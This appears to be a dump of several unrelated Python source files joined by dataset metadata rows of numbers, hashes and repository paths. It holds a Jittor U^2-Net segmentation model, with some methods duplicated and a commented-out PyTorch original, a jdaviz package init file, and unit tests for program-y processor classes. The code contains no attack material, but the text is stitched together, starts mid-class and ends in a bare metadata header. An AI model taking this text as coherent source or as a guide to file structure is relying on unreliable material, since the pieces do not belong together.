def get_loss(self, target, d0, d1, d2, d3, d4, d5, d6, ignore_index=None):
loss0 = nn.cross_entropy_loss(d0, target, ignore_index=ignore_index) # tar loss
loss1 = nn.cross_entropy_loss(d1, target, ignore_index=ignore_index)
loss2 = nn.cross_entropy_loss(d2, target, ignore_index=ignore_index)
loss3 = nn.cross_entropy_loss(d3, target, ignore_index=ignore_index)
loss4 = nn.cross_entropy_loss(d4, target, ignore_index=ignore_index)
loss5 = nn.cross_entropy_loss(d5, target, ignore_index=ignore_index)
loss6 = nn.cross_entropy_loss(d6, target, ignore_index=ignore_index)
loss = loss0 + loss1 + loss2 + loss3 + loss4 + loss5 + loss6
print("l0: %3f, l1: %3f, l2: %3f, l3: %3f, l4: %3f, l5: %3f, l6: %3f\n"%(loss0.data.item(),loss1.data.item(),loss2.data.item(),loss3.data.item(),loss4.data.item(),loss5.data.item(),loss6.data.item()))
return loss0, loss
def update_params(self, loss, optimizer):
optimizer.zero_grad()
loss.backward()
optimizer.step()
### U^2-Net small ###
class U2NETP(nn.Module):
def __init__(self, in_ch=3, n_classes=2):
super(U2NETP, self).__init__()
# encoder
self.stage1 = RSU7(in_ch, 16, 64)
self.pool12 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage2 = RSU6(64, 16, 64)
self.pool23 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage3 = RSU5(64, 16, 64)
self.pool34 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage4 = RSU4(64, 16, 64)
self.pool45 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage5 = RSU4F(64, 16, 64)
self.pool56 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
self.stage6 = RSU4F(64, 16, 64)
# decoder
self.stage5d = RSU4F(128, 16, 64)
self.stage4d = RSU4(128, 16, 64)
self.stage3d = RSU5(128, 16, 64)
self.stage2d = RSU6(128, 16, 64)
self.stage1d = RSU7(128, 16, 64)
self.side1 = nn.Conv(64, n_classes, 3, padding=1)
self.side2 = nn.Conv(64, n_classes, 3, padding=1)
self.side3 = nn.Conv(64, n_classes, 3, padding=1)
self.side4 = nn.Conv(64, n_classes, 3, padding=1)
self.side5 = nn.Conv(64, n_classes, 3, padding=1)
self.side6 = nn.Conv(64, n_classes, 3, padding=1)
self.outconv = nn.Conv((6 * n_classes), n_classes, 1)
def execute(self, x):
#-------------------- encoder -------------------
hx = x
#stage 1
hx1 = self.stage1(hx)
hx = self.pool12(hx1)
#stage 2
hx2 = self.stage2(hx)
hx = self.pool23(hx2)
#stage 3
hx3 = self.stage3(hx)
hx = self.pool34(hx3)
#stage 4
hx4 = self.stage4(hx)
hx = self.pool45(hx4)
#stage 5
hx5 = self.stage5(hx)
hx = self.pool56(hx5)
#stage 6
hx6 = self.stage6(hx)
hx6up = _upsample_like(hx6, hx5)
#-------------------- decoder -------------------
hx5d = self.stage5d(jt.contrib.concat((hx6up, hx5), dim=1))
hx5dup = _upsample_like(hx5d, hx4)
hx4d = self.stage4d(jt.contrib.concat((hx5dup, hx4), dim=1))
hx4dup = _upsample_like(hx4d, hx3)
hx3d = self.stage3d(jt.contrib.concat((hx4dup, hx3), dim=1))
hx3dup = _upsample_like(hx3d, hx2)
hx2d = self.stage2d(jt.contrib.concat((hx3dup, hx2), dim=1))
hx2dup = _upsample_like(hx2d, hx1)
hx1d = self.stage1d(jt.contrib.concat((hx2dup, hx1), dim=1))
#side output
d1 = self.side1(hx1d)
d2 = self.side2(hx2d)
d2 = _upsample_like(d2, d1)
d3 = self.side3(hx3d)
d3 = _upsample_like(d3, d1)
d4 = self.side4(hx4d)
d4 = _upsample_like(d4, d1)
d5 = self.side5(hx5d)
d5 = _upsample_like(d5, d1)
d6 = self.side6(hx6)
d6 = _upsample_like(d6, d1)
d0 = self.outconv(jt.contrib.concat((d1, d2, d3, d4, d5, d6), dim=1))
return d0
# return (jt.sigmoid(d0), jt.sigmoid(d1), jt.sigmoid(d2), jt.sigmoid(d3), jt.sigmoid(d4), jt.sigmoid(d5), jt.sigmoid(d6))
def get_loss(self, target, d0, d1, d2, d3, d4, d5, d6, ignore_index=None):
loss0 = nn.cross_entropy_loss(d0, target, ignore_index=ignore_index) # tar loss
loss1 = nn.cross_entropy_loss(d1, target, ignore_index=ignore_index)
loss2 = nn.cross_entropy_loss(d2, target, ignore_index=ignore_index)
loss3 = nn.cross_entropy_loss(d3, target, ignore_index=ignore_index)
loss4 = nn.cross_entropy_loss(d4, target, ignore_index=ignore_index)
loss5 = nn.cross_entropy_loss(d5, target, ignore_index=ignore_index)
loss6 = nn.cross_entropy_loss(d6, target, ignore_index=ignore_index)
loss = loss0 + loss1 + loss2 + loss3 + loss4 + loss5 + loss6
print("l0: %3f, l1: %3f, l2: %3f, l3: %3f, l4: %3f, l5: %3f, l6: %3f\n"%(loss0.data.item(),loss1.data.item(),loss2.data.item(),loss3.data.item(),loss4.data.item(),loss5.data.item(),loss6.data.item()))
return loss0, loss
def update_params(self, loss, optimizer):
optimizer.zero_grad()
loss.backward()
optimizer.step()
def main():
model = U2NETP()
x = jt.ones([2, 3, 512, 512])
y = model(x)
print (y[0].shape)
# _ = y.data
# Find total parameters and trainable parameters
total_params = sum(p.numel() for p in model.parameters())
print(f'{total_params:,} total parameters.')
total_trainable_params = sum(
p.numel() for p in model.parameters() if p.requires_grad)
print(f'{total_trainable_params:,} training parameters.')
from jittorsummary import summary
summary(model, input_size=(3, 512, 512))
'''
U2Net
44,052,518 total parameters.
44,023,718 training parameters.
U2NETP
1,140,358 total parameters.
1,134,662 training parameters.
'''
if __name__ == '__main__':
main()
# from jittor.utils.pytorch_converter import convert
# pytorch_code="""
# import torch
# import torch.nn as nn
# import torch.nn.functional as F
# class REBNCONV(nn.Module):
# def __init__(self,in_ch=3,out_ch=3,dirate=1):
# super(REBNCONV,self).__init__()
# self.conv_s1 = nn.Conv2d(in_ch,out_ch,3,padding=1*dirate,dilation=1*dirate)
# self.bn_s1 = nn.BatchNorm2d(out_ch)
# self.relu_s1 = nn.ReLU(inplace=True)
# def forward(self,x):
# hx = x
# xout = self.relu_s1(self.bn_s1(self.conv_s1(hx)))
# return xout
# ## upsample tensor 'src' to have the same spatial size with tensor 'tar'
# def _upsample_like(src,tar):
# src = nn.Upsample(src,size=tar.shape[2:],mode='bilinear')
# return src
# ### RSU-7 ###
# class RSU7(nn.Module):#UNet07DRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU7,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.pool1 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool2 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool3 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool4 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv5 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool5 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv6 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.rebnconv7 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv6d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv5d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv4d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx = self.pool1(hx1)
# hx2 = self.rebnconv2(hx)
# hx = self.pool2(hx2)
# hx3 = self.rebnconv3(hx)
# hx = self.pool3(hx3)
# hx4 = self.rebnconv4(hx)
# hx = self.pool4(hx4)
# hx5 = self.rebnconv5(hx)
# hx = self.pool5(hx5)
# hx6 = self.rebnconv6(hx)
# hx7 = self.rebnconv7(hx6)
# hx6d = self.rebnconv6d(torch.cat((hx7,hx6),1))
# hx6dup = _upsample_like(hx6d,hx5)
# hx5d = self.rebnconv5d(torch.cat((hx6dup,hx5),1))
# hx5dup = _upsample_like(hx5d,hx4)
# hx4d = self.rebnconv4d(torch.cat((hx5dup,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.rebnconv2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.rebnconv1d(torch.cat((hx2dup,hx1),1))
# return hx1d + hxin
# ### RSU-6 ###
# class RSU6(nn.Module):#UNet06DRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU6,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.pool1 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool2 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool3 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool4 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv5 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.rebnconv6 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv5d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv4d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx = self.pool1(hx1)
# hx2 = self.rebnconv2(hx)
# hx = self.pool2(hx2)
# hx3 = self.rebnconv3(hx)
# hx = self.pool3(hx3)
# hx4 = self.rebnconv4(hx)
# hx = self.pool4(hx4)
# hx5 = self.rebnconv5(hx)
# hx6 = self.rebnconv6(hx5)
# hx5d = self.rebnconv5d(torch.cat((hx6,hx5),1))
# hx5dup = _upsample_like(hx5d,hx4)
# hx4d = self.rebnconv4d(torch.cat((hx5dup,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.rebnconv2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.rebnconv1d(torch.cat((hx2dup,hx1),1))
# return hx1d + hxin
# ### RSU-5 ###
# class RSU5(nn.Module):#UNet05DRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU5,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.pool1 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool2 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool3 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.rebnconv5 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv4d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx = self.pool1(hx1)
# hx2 = self.rebnconv2(hx)
# hx = self.pool2(hx2)
# hx3 = self.rebnconv3(hx)
# hx = self.pool3(hx3)
# hx4 = self.rebnconv4(hx)
# hx5 = self.rebnconv5(hx4)
# hx4d = self.rebnconv4d(torch.cat((hx5,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.rebnconv2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.rebnconv1d(torch.cat((hx2dup,hx1),1))
# return hx1d + hxin
# ### RSU-4 ###
# class RSU4(nn.Module):#UNet04DRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU4,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.pool1 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.pool2 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=1)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=1)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx = self.pool1(hx1)
# hx2 = self.rebnconv2(hx)
# hx = self.pool2(hx2)
# hx3 = self.rebnconv3(hx)
# hx4 = self.rebnconv4(hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.rebnconv2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.rebnconv1d(torch.cat((hx2dup,hx1),1))
# return hx1d + hxin
# ### RSU-4F ###
# class RSU4F(nn.Module):#UNet04FRES(nn.Module):
# def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
# super(RSU4F,self).__init__()
# self.rebnconvin = REBNCONV(in_ch,out_ch,dirate=1)
# self.rebnconv1 = REBNCONV(out_ch,mid_ch,dirate=1)
# self.rebnconv2 = REBNCONV(mid_ch,mid_ch,dirate=2)
# self.rebnconv3 = REBNCONV(mid_ch,mid_ch,dirate=4)
# self.rebnconv4 = REBNCONV(mid_ch,mid_ch,dirate=8)
# self.rebnconv3d = REBNCONV(mid_ch*2,mid_ch,dirate=4)
# self.rebnconv2d = REBNCONV(mid_ch*2,mid_ch,dirate=2)
# self.rebnconv1d = REBNCONV(mid_ch*2,out_ch,dirate=1)
# def forward(self,x):
# hx = x
# hxin = self.rebnconvin(hx)
# hx1 = self.rebnconv1(hxin)
# hx2 = self.rebnconv2(hx1)
# hx3 = self.rebnconv3(hx2)
# hx4 = self.rebnconv4(hx3)
# hx3d = self.rebnconv3d(torch.cat((hx4,hx3),1))
# hx2d = self.rebnconv2d(torch.cat((hx3d,hx2),1))
# hx1d = self.rebnconv1d(torch.cat((hx2d,hx1),1))
# return hx1d + hxin
# ##### U^2-Net ####
# class U2NET(nn.Module):
# def __init__(self,in_ch=3,out_ch=1):
# super(U2NET,self).__init__()
# self.stage1 = RSU7(in_ch,32,64)
# self.pool12 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage2 = RSU6(64,32,128)
# self.pool23 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage3 = RSU5(128,64,256)
# self.pool34 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage4 = RSU4(256,128,512)
# self.pool45 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage5 = RSU4F(512,256,512)
# self.pool56 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage6 = RSU4F(512,256,512)
# # decoder
# self.stage5d = RSU4F(1024,256,512)
# self.stage4d = RSU4(1024,128,256)
# self.stage3d = RSU5(512,64,128)
# self.stage2d = RSU6(256,32,64)
# self.stage1d = RSU7(128,16,64)
# self.side1 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side2 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side3 = nn.Conv2d(128,out_ch,3,padding=1)
# self.side4 = nn.Conv2d(256,out_ch,3,padding=1)
# self.side5 = nn.Conv2d(512,out_ch,3,padding=1)
# self.side6 = nn.Conv2d(512,out_ch,3,padding=1)
# self.outconv = nn.Conv2d(6*out_ch,out_ch,1)
# def forward(self,x):
# hx = x
# #stage 1
# hx1 = self.stage1(hx)
# hx = self.pool12(hx1)
# #stage 2
# hx2 = self.stage2(hx)
# hx = self.pool23(hx2)
# #stage 3
# hx3 = self.stage3(hx)
# hx = self.pool34(hx3)
# #stage 4
# hx4 = self.stage4(hx)
# hx = self.pool45(hx4)
# #stage 5
# hx5 = self.stage5(hx)
# hx = self.pool56(hx5)
# #stage 6
# hx6 = self.stage6(hx)
# hx6up = _upsample_like(hx6,hx5)
# #-------------------- decoder --------------------
# hx5d = self.stage5d(torch.cat((hx6up,hx5),1))
# hx5dup = _upsample_like(hx5d,hx4)
# hx4d = self.stage4d(torch.cat((hx5dup,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.stage3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.stage2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.stage1d(torch.cat((hx2dup,hx1),1))
# #side output
# d1 = self.side1(hx1d)
# d2 = self.side2(hx2d)
# d2 = _upsample_like(d2,d1)
# d3 = self.side3(hx3d)
# d3 = _upsample_like(d3,d1)
# d4 = self.side4(hx4d)
# d4 = _upsample_like(d4,d1)
# d5 = self.side5(hx5d)
# d5 = _upsample_like(d5,d1)
# d6 = self.side6(hx6)
# d6 = _upsample_like(d6,d1)
# d0 = self.outconv(torch.cat((d1,d2,d3,d4,d5,d6),1))
# return F.sigmoid(d0), F.sigmoid(d1), F.sigmoid(d2), F.sigmoid(d3), F.sigmoid(d4), F.sigmoid(d5), F.sigmoid(d6)
# ### U^2-Net small ###
# class U2NETP(nn.Module):
# def __init__(self,in_ch=3,out_ch=1):
# super(U2NETP,self).__init__()
# self.stage1 = RSU7(in_ch,16,64)
# self.pool12 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage2 = RSU6(64,16,64)
# self.pool23 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage3 = RSU5(64,16,64)
# self.pool34 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage4 = RSU4(64,16,64)
# self.pool45 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage5 = RSU4F(64,16,64)
# self.pool56 = nn.MaxPool2d(2,stride=2,ceil_mode=True)
# self.stage6 = RSU4F(64,16,64)
# # decoder
# self.stage5d = RSU4F(128,16,64)
# self.stage4d = RSU4(128,16,64)
# self.stage3d = RSU5(128,16,64)
# self.stage2d = RSU6(128,16,64)
# self.stage1d = RSU7(128,16,64)
# self.side1 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side2 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side3 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side4 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side5 = nn.Conv2d(64,out_ch,3,padding=1)
# self.side6 = nn.Conv2d(64,out_ch,3,padding=1)
# self.outconv = nn.Conv2d(6*out_ch,out_ch,1)
# def forward(self,x):
# hx = x
# #stage 1
# hx1 = self.stage1(hx)
# hx = self.pool12(hx1)
# #stage 2
# hx2 = self.stage2(hx)
# hx = self.pool23(hx2)
# #stage 3
# hx3 = self.stage3(hx)
# hx = self.pool34(hx3)
# #stage 4
# hx4 = self.stage4(hx)
# hx = self.pool45(hx4)
# #stage 5
# hx5 = self.stage5(hx)
# hx = self.pool56(hx5)
# #stage 6
# hx6 = self.stage6(hx)
# hx6up = _upsample_like(hx6,hx5)
# #decoder
# hx5d = self.stage5d(torch.cat((hx6up,hx5),1))
# hx5dup = _upsample_like(hx5d,hx4)
# hx4d = self.stage4d(torch.cat((hx5dup,hx4),1))
# hx4dup = _upsample_like(hx4d,hx3)
# hx3d = self.stage3d(torch.cat((hx4dup,hx3),1))
# hx3dup = _upsample_like(hx3d,hx2)
# hx2d = self.stage2d(torch.cat((hx3dup,hx2),1))
# hx2dup = _upsample_like(hx2d,hx1)
# hx1d = self.stage1d(torch.cat((hx2dup,hx1),1))
# #side output
# d1 = self.side1(hx1d)
# d2 = self.side2(hx2d)
# d2 = _upsample_like(d2,d1)
# d3 = self.side3(hx3d)
# d3 = _upsample_like(d3,d1)
# d4 = self.side4(hx4d)
# d4 = _upsample_like(d4,d1)
# d5 = self.side5(hx5d)
# d5 = _upsample_like(d5,d1)
# d6 = self.side6(hx6)
# d6 = _upsample_like(d6,d1)
# d0 = self.outconv(torch.cat((d1,d2,d3,d4,d5,d6),1))
# return F.sigmoid(d0), F.sigmoid(d1), F.sigmoid(d2), F.sigmoid(d3), F.sigmoid(d4), F.sigmoid(d5), F.sigmoid(d6)
# """
# jittor_code = convert(pytorch_code)
# print(jittor_code)
| 34.622222
| 208
| 0.588954
| 4,869
| 34,276
| 4.001027
| 0.050729
| 0.045686
| 0.039731
| 0.050716
| 0.951953
| 0.94913
| 0.94297
| 0.937683
| 0.936143
| 0.900159
| 0
| 0.087079
| 0.255543
| 34,276
| 990
| 209
| 34.622222
| 0.676373
| 0.447835
| 0
| 0.733333
| 0
| 0.005556
| 0.021418
| 0.001424
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061111
| false
| 0
| 0.011111
| 0
| 0.125
| 0.013889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
edd8c7fdaef9b6620dfe6b80f62f514ea56c8aa2
| 162
|
py
|
Python
|
jdaviz/configs/cubeviz/plugins/__init__.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 55
|
2019-05-24T18:53:05.000Z
|
2022-03-14T08:45:52.000Z
|
jdaviz/configs/cubeviz/plugins/__init__.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 1,105
|
2019-05-09T15:17:35.000Z
|
2022-03-31T21:22:18.000Z
|
jdaviz/configs/cubeviz/plugins/__init__.py
|
rosteen/jdaviz
|
e02c08d68ef71c5e40600785f46e65e5ae95e236
|
[
"MIT",
"BSD-3-Clause"
] | 49
|
2019-05-07T18:05:42.000Z
|
2022-03-22T15:15:34.000Z
|
from .viewers import * # noqa
from .unified_slider.unified_slider import * # noqa
from .parsers import * # noqa
from .moment_maps.moment_maps import * # noqa
| 32.4
| 52
| 0.740741
| 22
| 162
| 5.272727
| 0.409091
| 0.344828
| 0.362069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.17284
| 162
| 4
| 53
| 40.5
| 0.865672
| 0.117284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b670a377acec8e7943980e7d67cb8514cb48bdc9
| 4,466
|
py
|
Python
|
test/programytest/storage/stores/nosql/mongo/dao/test_processor.py
|
NeolithEra/program-y
|
8c2396611f30c8095e98ff02988223a641c1a3be
|
[
"MIT"
] | null | null | null |
test/programytest/storage/stores/nosql/mongo/dao/test_processor.py
|
NeolithEra/program-y
|
8c2396611f30c8095e98ff02988223a641c1a3be
|
[
"MIT"
] | null | null | null |
test/programytest/storage/stores/nosql/mongo/dao/test_processor.py
|
NeolithEra/program-y
|
8c2396611f30c8095e98ff02988223a641c1a3be
|
[
"MIT"
] | null | null | null |
import unittest
from programy.storage.stores.nosql.mongo.dao.processor import PreProcessor
from programy.storage.stores.nosql.mongo.dao.processor import PostProcessor
from programy.storage.stores.nosql.mongo.dao.processor import PostQuestionProcessor
class PreProcessorTests(unittest.TestCase):
def test_init_no_id(self):
processor = PreProcessor(classname="test.processorclass")
self.assertIsNotNone(processor)
self.assertIsNone(processor.id)
self.assertEqual("test.processorclass", processor.classname)
self.assertEqual({'classname': 'test.processorclass'}, processor.to_document())
def test_init_with_id(self):
processor = PreProcessor(classname="test.processorclass")
processor.id = '666'
self.assertIsNotNone(processor)
self.assertIsNotNone(processor.id)
self.assertEqual('666', processor.id)
self.assertEqual("test.processorclass", processor.classname)
self.assertEqual({'_id': '666', 'classname': 'test.processorclass'}, processor.to_document())
def test_from_document(self):
processor1 = PreProcessor.from_document({'classname': 'test.processorclass'})
self.assertIsNotNone(processor1)
self.assertIsNone(processor1.id)
self.assertEqual("test.processorclass", processor1.classname)
processor2 = PreProcessor.from_document({'_id': '666', 'classname': 'test.processorclass'})
self.assertIsNotNone(processor2)
self.assertIsNotNone(processor2.id)
self.assertEqual('666', processor2.id)
self.assertEqual("test.processorclass", processor2.classname)
class PostProcessorTests(unittest.TestCase):
def test_init_no_id(self):
processor = PostProcessor(classname="test.processorclass")
self.assertIsNotNone(processor)
self.assertIsNone(processor.id)
self.assertEqual("test.processorclass", processor.classname)
self.assertEqual({'classname': 'test.processorclass'}, processor.to_document())
def test_init_with_id(self):
processor = PostProcessor(classname="test.processorclass")
processor.id = '666'
self.assertIsNotNone(processor)
self.assertIsNotNone(processor.id)
self.assertEqual('666', processor.id)
self.assertEqual("test.processorclass", processor.classname)
self.assertEqual({'_id': '666', 'classname': 'test.processorclass'}, processor.to_document())
def test_from_document(self):
processor1 = PostProcessor.from_document({'classname': 'test.processorclass'})
self.assertIsNotNone(processor1)
self.assertIsNone(processor1.id)
self.assertEqual("test.processorclass", processor1.classname)
processor2 = PostProcessor.from_document({'_id': '666', 'classname': 'test.processorclass'})
self.assertIsNotNone(processor2)
self.assertIsNotNone(processor2.id)
self.assertEqual('666', processor2.id)
self.assertEqual("test.processorclass", processor2.classname)
class PostQuestionProcessorTests(unittest.TestCase):
def test_init_no_id(self):
processor = PostQuestionProcessor(classname="test.processorclass")
self.assertIsNotNone(processor)
self.assertIsNone(processor.id)
self.assertEqual("test.processorclass", processor.classname)
self.assertEqual({'classname': 'test.processorclass'}, processor.to_document())
def test_init_with_id(self):
processor = PostQuestionProcessor(classname="test.processorclass")
processor.id = '666'
self.assertIsNotNone(processor)
self.assertIsNotNone(processor.id)
self.assertEqual('666', processor.id)
self.assertEqual("test.processorclass", processor.classname)
self.assertEqual({'_id': '666', 'classname': 'test.processorclass'}, processor.to_document())
def test_from_document(self):
processor1 = PostQuestionProcessor.from_document({'classname': 'test.processorclass'})
self.assertIsNotNone(processor1)
self.assertIsNone(processor1.id)
self.assertEqual("test.processorclass", processor1.classname)
processor2 = PostQuestionProcessor.from_document({'_id': '666', 'classname': 'test.processorclass'})
self.assertIsNotNone(processor2)
self.assertIsNotNone(processor2.id)
self.assertEqual('666', processor2.id)
self.assertEqual("test.processorclass", processor2.classname)
| 42.533333
| 108
| 0.71451
| 422
| 4,466
| 7.462085
| 0.082938
| 0.171483
| 0.154335
| 0.080025
| 0.930772
| 0.930772
| 0.930772
| 0.901556
| 0.901556
| 0.809146
| 0
| 0.019344
| 0.166592
| 4,466
| 104
| 109
| 42.942308
| 0.826706
| 0
| 0
| 0.835443
| 0
| 0
| 0.16592
| 0
| 0
| 0
| 0
| 0
| 0.607595
| 1
| 0.113924
| false
| 0
| 0.050633
| 0
| 0.202532
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b67f70c44d341391e6967880195ac974cc3cdb39
| 68,566
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
